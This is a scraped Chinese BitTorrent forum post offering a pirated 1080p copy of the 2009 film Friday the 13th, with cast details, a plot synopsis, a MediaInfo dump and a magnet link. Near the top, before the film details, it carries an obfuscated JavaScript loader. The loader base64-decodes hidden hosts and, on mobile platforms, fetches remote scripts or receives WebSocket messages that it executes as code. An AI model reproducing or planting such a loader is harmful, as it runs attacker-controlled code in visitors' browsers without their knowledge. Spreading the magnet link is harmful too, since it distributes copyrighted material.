黑色星期五[中文字幕].Friday.the.13th.2009.1080p.BluRay.x265.10bit.DTS 5.35GB

版主小s 1月前 316

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 黑色星期五 / 13号星期五
◎片  名 Friday the 13th
◎年  代 2009
◎产  地 美国
◎类  别 恐怖
◎语  言 英语 / 乌克兰语
◎上映日期 2009-02-09(洛杉矶首映) / 2020-02-13(美国)
◎IMDb链接 https://www.imdb.com/title/tt0758746/
◎豆瓣评分 5.8/10 (9963人评价)
◎豆瓣链接 https://movie.douban.com/subject/1914923/
◎片  长 97分钟
◎导  演 马库斯·尼斯佩尔 Marcus Nispel (id:1000324)
◎编  剧 达米安·香农 Damian Shannon (id:1374706)
       马克·斯威夫特 Mark Swift (id:1374707)
       马克·惠顿 Mark Wheaton (id:1014398)
       维克多·米勒 Victor Miller (id:1045649)
◎演  员 贾德·帕达里克 Jared Padalecki (id:1053555)
       丹妮尔·帕娜贝克 Danielle Panabaker (id:1049502)
       阿曼达·莱赫提 Amanda Righetti (id:1000056)
       特拉维斯·范·文克 Travis Van Winkle (id:1040631)
       艾伦·余 Aaron Yoo (id:1044922)
       德里克·梅耶斯 Derek Mears (id:1048121)
       乔纳森·萨多斯基 Jonathan Sadowski (id:1202232)
       朱丽安娜·古尔 Julianna Guill (id:1009307)
       本·费德曼 Ben Feldman (id:1017951)
       亚伦·艾斯卡本塔 Arlen Escarpeta (id:1088890)
       瑞恩·汉森 Ryan Hansen (id:1009328)
       薇拉·福特 Willa Ford (id:1004724)
       阿美莉嘉·奥利沃 America Olivo (id:1013885)
       凯尔·戴维斯 Kyle Davis (id:1188268)
       理查德·布基 Richard Burgi (id:1022752)
       克里斯·科波拉 Chris Coppola (id:1374217)
       娜娜·维西特 Nana Visitor (id:1025254)
       Travis Davis Travis Davis (id:1028207)
        Jaime De La Rosa (id:1227419)
        David Lyman (id:1258355)
        David Sharp (id:1258363)
       肖恩·S·坎宁安 Sean S. Cunningham (id:1014283)
       布拉德利·福勒 Bradley Fuller (id:1284314)
       迈克尔·贝 Michael Bay (id:1027776)
       斯蒂夫·贾布隆斯基 Steve Jablonsky (id:1027591)
       Nicole Michaud Nicole Michaud (id:1205701)
       Roland Blancaflor Roland Blancaflor (id:1064418)
       Carla Palmer Carla Palmer (id:1127003)
       凯蒂·塔尔 Katie Tull (id:1156011)
       Doug Carter Doug Carter (id:1024169)
       马克·帕兰斯基 Mark Palansky (id:1293834)
       Matthew Maude Matthew Maude (id:1211968)
        Eddie Offermann (id:1248000)
       Kevin Culhane Kevin Culhane (id:1071087)

◎标  签 恐怖 / 惊悚 / 美国 / 血腥 / 杰森系列 / 2009 / 美国电影 / 恐怖电影

◎简  介
  少女惠特妮?米勒(Amanda Righetti 饰)及其男友麦克(Nick Mennell 饰)等一行五人前往水晶湖森林游玩,快乐的假期很快为血腥杀戮所取代,躲藏在暗处的杀人魔王杰森(Derek Mears 饰)突然出现,将青年男女们逐一杀害。                                    
                                六周后,大学生特伦特(Travis Van Winkle 饰)及其一班朋友又来到水晶湖的小木屋内狂欢,他们偶遇寻找妹妹惠特妮的克雷(Jared Padalecki 饰)。虽然警方声称此地不见失踪人员身影,但克雷坚信妹妹必然身在丛林某处。与此同时,特伦特的两个朋友遭到杰森袭击,这群惶恐的大学生和克雷联合起来,共同面对身带血腥与杀戮气息的杰森……

◎获奖情况 (共2项)
  第18届MTV电影奖 (2009)
  MTV电影奖 最佳反派(提名)
   └──德里克·梅耶斯 (id:1048121)

  第11届美国青少年选择奖 (2009)
  最佳恐怖/惊悚电影

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 124067340131609049448890509931257896371 (0x5D568023E9D134EAD664B246BE359DB3)

  4. Complete name                            : Friday the 13th 2009 1080p Blu-ray x265 10bit [email protected]

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.35 GiB

  8. Duration                                 : 1 h 37 min

  9. Overall bit rate                         : 7 886 kb/s

  10. Movie name                               : Friday the 13th

  11. Encoded date                             : UTC 2021-08-31 15:20:31

  12. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID                                       : 1

  16. Format                                   : HEVC

  17. Format/Info                              : High Efficiency Video Coding

  18. Format profile                           : Main [email protected]@Main

  19. Codec ID                                 : V_MPEGH/ISO/HEVC

  20. Duration                                 : 1 h 37 min

  21. Bit rate                                 : 6 323 kb/s

  22. Width                                    : 1 920 pixels

  23. Height                                   : 804 pixels

  24. Display aspect ratio                     : 2.40:1

  25. Frame rate mode                          : Constant

  26. Frame rate                               : 23.976 (24000/1001/53354) FPS

  27. Color space                              : YUV

  28. Chroma subsampling                       : 4:2:0

  29. Bit depth                                : 10 bits

  30. Bits/(Pixel*Frame)                       : 0.171

  31. Stream size                              : 4.29 GiB (80%)

  32. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings                        : rc=crf / crf=17.5000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=12 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=5 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Language                                 : English

  35. Default                                  : Yes

  36. Forced                                   : No


  37. Audio

  38. ID                                       : 2

  39. Format                                   : DTS

  40. Format/Info                              : Digital Theater Systems

  41. Codec ID                                 : A_DTS

  42. Duration                                 : 1 h 37 min

  43. Bit rate mode                            : Constant

  44. Bit rate                                 : 1 510 kb/s

  45. Channel(s)                               : 6 channels

  46. Channel layout                           : C L R Ls Rs LFE

  47. Sampling rate                            : 48.0 kHz

  48. Frame rate                               : 93.750 FPS (512 SPF)

  49. Bit depth                                : 24 bits

  50. Compression mode                         : Lossy

  51. Stream size                              : 1.02 GiB (19%)

  52. Title                                    : eng

  53. Language                                 : Chinese

  54. Default                                  : Yes

  55. Forced                                   : No


  56. Text #1

  57. ID                                       : 3

  58. Format                                   : PGS

  59. Muxing mode                              : zlib

  60. Codec ID                                 : S_HDMV/PGS

  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration                                 : 1 h 29 min

  63. Bit rate                                 : 32.3 kb/s

  64. Count of elements                        : 1724

  65. Stream size                              : 20.8 MiB (0%)

  66. Title                                    : chs&eng

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No


  70. Text #2

  71. ID                                       : 4

  72. Format                                   : PGS

  73. Muxing mode                              : zlib

  74. Codec ID                                 : S_HDMV/PGS

  75. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration                                 : 1 h 29 min

  77. Bit rate                                 : 32.4 kb/s

  78. Count of elements                        : 1724

  79. Stream size                              : 20.9 MiB (0%)

  80. Title                                    : cht&eng

  81. Language                                 : Chinese

  82. Default                                  : Yes

  83. Forced                                   : No


  84. Text #3

  85. ID                                       : 5

  86. Format                                   : PGS

  87. Muxing mode                              : zlib

  88. Codec ID                                 : S_HDMV/PGS

  89. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration                                 : 1 h 29 min

  91. Bit rate                                 : 17.5 kb/s

  92. Count of elements                        : 1724

  93. Stream size                              : 11.3 MiB (0%)

  94. Title                                    : chs

  95. Language                                 : Chinese

  96. Default                                  : Yes

  97. Forced                                   : No


  98. Text #4

  99. ID                                       : 6

  100. Format                                   : PGS

  101. Muxing mode                              : zlib

  102. Codec ID                                 : S_HDMV/PGS

  103. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration                                 : 1 h 29 min

  105. Bit rate                                 : 17.7 kb/s

  106. Count of elements                        : 1724

  107. Stream size                              : 11.4 MiB (0%)

  108. Title                                    : cht

  109. Language                                 : Chinese

  110. Default                                  : Yes

  111. Forced                                   : No


  112. Text #5

  113. ID                                       : 7

  114. Format                                   : PGS

  115. Muxing mode                              : zlib

  116. Codec ID                                 : S_HDMV/PGS

  117. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration                                 : 1 h 28 min

  119. Bit rate                                 : 27.7 kb/s

  120. Count of elements                        : 1750

  121. Stream size                              : 17.5 MiB (0%)

  122. Title                                    : eng

  123. Language                                 : English

  124. Default                                  : Yes

  125. Forced                                   : No



TAGS 恐怖

磁力链:
  • magnet:?xt=urn:btih:DEE1C785FA43B95318218AC75D9B1D0FC835F1C7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回